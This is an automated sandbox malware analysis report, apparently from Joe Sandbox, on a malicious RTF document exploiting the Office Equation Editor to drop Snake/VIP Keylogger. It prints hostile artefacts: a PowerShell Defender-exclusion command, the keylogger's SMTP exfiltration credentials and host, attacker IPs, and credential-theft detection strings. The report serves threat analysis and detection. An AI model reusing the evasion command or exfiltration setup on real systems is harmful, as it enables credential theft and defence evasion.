Edit tour

Windows Analysis Report
na.doc

Overview

General Information

Sample name:	na.doc
Analysis ID:	1545181
MD5:	17fbc6bf368de449e0afb59ff45af1fd
SHA1:	f4522ebabac9835ecdad5137fa00b185ecbef04c
SHA256:	8c53c38be598e4c508023f712a8b0d84b13ddfd65cbe17ef33a8200d26881f7a
Tags:	docuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Initial sample is an obfuscated RTF file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Suricata IDS alerts for network traffic

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Adds a directory exclusion to Windows Defender

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Document exploit detected (process start blacklist hit)

Injects a PE file into a foreign processes

Installs new ROOT certificates

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Equation Editor Network Connection

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Sigma detected: Suspicious Microsoft Office Child Process

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 3208 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 3304 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

cmnjgwhesilo61000.exe (PID: 3464 cmdline: "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe" MD5: 06A6B60A72D4C7A394B8345EE8047851)

powershell.exe (PID: 3556 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)

cmnjgwhesilo61000.exe (PID: 3572 cmdline: "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe" MD5: 06A6B60A72D4C7A394B8345EE8047851)

EQNEDT32.EXE (PID: 3784 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "whesilolog@jhxkgroup.online", "Password": "7213575aceACE@@  ", "Host": "mail.jhxkgroup.online", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "whesilolog@jhxkgroup.online", "Password": "7213575aceACE@@  ", "Host": "mail.jhxkgroup.online", "Port": "587", "Version": "4.4"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
na.doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x1f0e69:$obj1: \objhtml 0x1f0e8f:$obj2: \objdata 0x1f0ea8:$obj3: \objupdate

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e2ec:$a1: get_encryptedPassword 0x2e874:$a2: get_encryptedUsername 0x2df5f:$a3: get_timePasswordChanged 0x2e076:$a4: get_passwordField 0x2e302:$a5: set_encryptedPassword 0x3101e:$a6: get_passwords 0x313b2:$a7: get_logins 0x3100a:$a8: GetOutlookPasswords 0x309c3:$a9: StartKeylogger 0x3130b:$a10: KeyLoggerEventArgs 0x30a63:$a11: KeyLoggerEventArgsEventHandler
00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xbec94:$a1: get_encryptedPassword 0x1024b4:$a1: get_encryptedPassword 0x145ad4:$a1: get_encryptedPassword 0xbf21c:$a2: get_encryptedUsername 0x102a3c:$a2: get_encryptedUsername 0x14605c:$a2: get_encryptedUsername 0xbe907:$a3: get_timePasswordChanged 0x102127:$a3: get_timePasswordChanged 0x145747:$a3: get_timePasswordChanged 0xbea1e:$a4: get_passwordField 0x10223e:$a4: get_passwordField 0x14585e:$a4: get_passwordField 0xbecaa:$a5: set_encryptedPassword 0x1024ca:$a5: set_encryptedPassword 0x145aea:$a5: set_encryptedPassword 0xc19c6:$a6: get_passwords 0x1051e6:$a6: get_passwords 0x148806:$a6: get_passwords 0xc1d5a:$a7: get_logins 0x10557a:$a7: get_logins 0x148b9a:$a7: get_logins
Process Memory Space: cmnjgwhesilo61000.exe PID: 3464	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: cmnjgwhesilo61000.exe PID: 3464	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: cmnjgwhesilo61000.exe PID: 3464	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: cmnjgwhesilo61000.exe PID: 3464	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x7edb:$a1: get_encryptedPassword 0x8459:$a2: get_encryptedUsername 0x7b5d:$a3: get_timePasswordChanged 0x7c74:$a4: get_passwordField 0x7ef1:$a5: set_encryptedPassword 0xabb5:$a6: get_passwords 0xaf45:$a7: get_logins 0xaba1:$a8: GetOutlookPasswords 0xa55a:$a9: StartKeylogger 0xae9e:$a10: KeyLoggerEventArgs 0xa5fa:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: cmnjgwhesilo61000.exe PID: 3572	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: cmnjgwhesilo61000.exe PID: 3572	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: cmnjgwhesilo61000.exe PID: 3572	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: cmnjgwhesilo61000.exe PID: 3572	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x16ba1:$a1: get_encryptedPassword 0x1711f:$a2: get_encryptedUsername 0x16823:$a3: get_timePasswordChanged 0x1693a:$a4: get_passwordField 0x16bb7:$a5: set_encryptedPassword 0x1987b:$a6: get_passwords 0x19c0b:$a7: get_logins 0x19867:$a8: GetOutlookPasswords 0x19220:$a9: StartKeylogger 0x19b64:$a10: KeyLoggerEventArgs 0x192c0:$a11: KeyLoggerEventArgsEventHandler
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c6ec:$a1: get_encryptedPassword 0x2cc74:$a2: get_encryptedUsername 0x2c35f:$a3: get_timePasswordChanged 0x2c476:$a4: get_passwordField 0x2c702:$a5: set_encryptedPassword 0x2f41e:$a6: get_passwords 0x2f7b2:$a7: get_logins 0x2f40a:$a8: GetOutlookPasswords 0x2edc3:$a9: StartKeylogger 0x2f70b:$a10: KeyLoggerEventArgs 0x2ee63:$a11: KeyLoggerEventArgsEventHandler
5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39d2a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x393cd:$a3: \Google\Chrome\User Data\Default\Login Data 0x3962a:$a4: \Orbitum\User Data\Default\Login Data 0x3a009:$a5: \Kometa\User Data\Default\Login Data
5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2dab0:$s1: UnHook 0x2dab7:$s2: SetHook 0x2dabf:$s3: CallNextHook 0x2dacc:$s4: _hook
7.2.cmnjgwhesilo61000.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.cmnjgwhesilo61000.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.2.cmnjgwhesilo61000.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.cmnjgwhesilo61000.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c6ec:$a1: get_encryptedPassword 0x2cc74:$a2: get_encryptedUsername 0x2c35f:$a3: get_timePasswordChanged 0x2c476:$a4: get_passwordField 0x2c702:$a5: set_encryptedPassword 0x2f41e:$a6: get_passwords 0x2f7b2:$a7: get_logins 0x2f40a:$a8: GetOutlookPasswords 0x2edc3:$a9: StartKeylogger 0x2f70b:$a10: KeyLoggerEventArgs 0x2ee63:$a11: KeyLoggerEventArgsEventHandler
7.2.cmnjgwhesilo61000.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e4ec:$a1: get_encryptedPassword 0x2ea74:$a2: get_encryptedUsername 0x2e15f:$a3: get_timePasswordChanged 0x2e276:$a4: get_passwordField 0x2e502:$a5: set_encryptedPassword 0x3121e:$a6: get_passwords 0x315b2:$a7: get_logins 0x3120a:$a8: GetOutlookPasswords 0x30bc3:$a9: StartKeylogger 0x3150b:$a10: KeyLoggerEventArgs 0x30c63:$a11: KeyLoggerEventArgsEventHandler
5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39d2a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x393cd:$a3: \Google\Chrome\User Data\Default\Login Data 0x3962a:$a4: \Orbitum\User Data\Default\Login Data 0x3a009:$a5: \Kometa\User Data\Default\Login Data
7.2.cmnjgwhesilo61000.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bb2a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b1cd:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b42a:$a4: \Orbitum\User Data\Default\Login Data 0x3be09:$a5: \Kometa\User Data\Default\Login Data
5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2dab0:$s1: UnHook 0x2dab7:$s2: SetHook 0x2dabf:$s3: CallNextHook 0x2dacc:$s4: _hook
7.2.cmnjgwhesilo61000.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f8b0:$s1: UnHook 0x2f8b7:$s2: SetHook 0x2f8bf:$s3: CallNextHook 0x2f8cc:$s4: _hook
5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e4ec:$a1: get_encryptedPassword 0x71b0c:$a1: get_encryptedPassword 0x2ea74:$a2: get_encryptedUsername 0x72094:$a2: get_encryptedUsername 0x2e15f:$a3: get_timePasswordChanged 0x7177f:$a3: get_timePasswordChanged 0x2e276:$a4: get_passwordField 0x71896:$a4: get_passwordField 0x2e502:$a5: set_encryptedPassword 0x71b22:$a5: set_encryptedPassword 0x3121e:$a6: get_passwords 0x7483e:$a6: get_passwords 0x315b2:$a7: get_logins 0x74bd2:$a7: get_logins 0x3120a:$a8: GetOutlookPasswords 0x7482a:$a8: GetOutlookPasswords 0x30bc3:$a9: StartKeylogger 0x741e3:$a9: StartKeylogger 0x3150b:$a10: KeyLoggerEventArgs 0x74b2b:$a10: KeyLoggerEventArgs 0x30c63:$a11: KeyLoggerEventArgsEventHandler
5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f8b0:$s1: UnHook 0x72ed0:$s1: UnHook 0x2f8b7:$s2: SetHook 0x72ed7:$s2: SetHook 0x2f8bf:$s3: CallNextHook 0x72edf:$s3: CallNextHook 0x2f8cc:$s4: _hook 0x72eec:$s4: _hook
5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e4ec:$a1: get_encryptedPassword 0x71d0c:$a1: get_encryptedPassword 0xb532c:$a1: get_encryptedPassword 0x2ea74:$a2: get_encryptedUsername 0x72294:$a2: get_encryptedUsername 0xb58b4:$a2: get_encryptedUsername 0x2e15f:$a3: get_timePasswordChanged 0x7197f:$a3: get_timePasswordChanged 0xb4f9f:$a3: get_timePasswordChanged 0x2e276:$a4: get_passwordField 0x71a96:$a4: get_passwordField 0xb50b6:$a4: get_passwordField 0x2e502:$a5: set_encryptedPassword 0x71d22:$a5: set_encryptedPassword 0xb5342:$a5: set_encryptedPassword 0x3121e:$a6: get_passwords 0x74a3e:$a6: get_passwords 0xb805e:$a6: get_passwords 0x315b2:$a7: get_logins 0x74dd2:$a7: get_logins 0xb83f2:$a7: get_logins
5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f8b0:$s1: UnHook 0x730d0:$s1: UnHook 0xb66f0:$s1: UnHook 0x2f8b7:$s2: SetHook 0x730d7:$s2: SetHook 0xb66f7:$s2: SetHook 0x2f8bf:$s3: CallNextHook 0x730df:$s3: CallNextHook 0xb66ff:$s3: CallNextHook 0x2f8cc:$s4: _hook 0x730ec:$s4: _hook 0xb670c:$s4: _hook
Click to see the 26 entries

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 87.120.84.38, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3304, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3304, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\pKL9HXcZosWfPt1[1].exe

System Summary

Sigma detected: Equation Editor Network Connection

Source: Network Connection

Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3304, Protocol: tcp, SourceIp: 87.120.84.38, SourceIsIpv6: false, SourcePort: 80

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe", ParentImage: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe, ParentProcessId: 3464, ParentProcessName: cmnjgwhesilo61000.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe", ProcessId: 3556, ProcessName: powershell.exe

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Source: Process started

Author: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe", CommandLine: "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe, NewProcessName: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe, OriginalFileName: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3304, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe", ProcessId: 3464, ProcessName: cmnjgwhesilo61000.exe

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe", CommandLine: "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe, NewProcessName: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe, OriginalFileName: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3304, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe", ProcessId: 3464, ProcessName: cmnjgwhesilo61000.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Source: DNS query

Author: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe, QueryName: checkip.dyndns.org

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3304, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe", ParentImage: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe, ParentProcessId: 3464, ParentProcessName: cmnjgwhesilo61000.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe", ProcessId: 3556, ProcessName: powershell.exe

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3208, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3556, TargetFilename: C:\Users\user\AppData\Local\Temp\vrbipaey.i1k.ps1

Suricata Signatures

ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T08:25:03.736440+0100	2022050	1	A Network Trojan was detected	87.120.84.38	80	192.168.2.22	49163	TCP

ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T08:25:03.910796+0100	2022051	1	A Network Trojan was detected	87.120.84.38	80	192.168.2.22	49163	TCP

ETPRO EXPLOIT Adobe EMF File Memory Corrpution Vulnerability Inbound (CVE-2017-3123)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T08:25:03.910796+0100	2827449	1	Attempted User Privilege Gain	87.120.84.38	80	192.168.2.22	49163	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T08:25:19.864564+0100	2803305	3	Unknown Traffic	192.168.2.22	49166	188.114.96.3	443	TCP
2024-10-30T08:25:27.981705+0100	2803305	3	Unknown Traffic	192.168.2.22	49170	188.114.97.3	443	TCP
2024-10-30T08:25:30.692758+0100	2803305	3	Unknown Traffic	192.168.2.22	49172	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T08:25:15.954394+0100	2803274	2	Potentially Bad Traffic	192.168.2.22	49164	193.122.6.168	80	TCP
2024-10-30T08:25:19.302467+0100	2803274	2	Potentially Bad Traffic	192.168.2.22	49164	193.122.6.168	80	TCP
2024-10-30T08:25:20.954242+0100	2803274	2	Potentially Bad Traffic	192.168.2.22	49167	193.122.6.168	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: na.doc

Avira: detected

Found malware configuration

Source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "whesilolog@jhxkgroup.online", "Password": "7213575aceACE@@ ", "Host": "mail.jhxkgroup.online", "Port": "587", "Version": "4.4"}
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "whesilolog@jhxkgroup.online", "Password": "7213575aceACE@@ ", "Host": "mail.jhxkgroup.online", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: na.doc

ReversingLabs: Detection: 34%

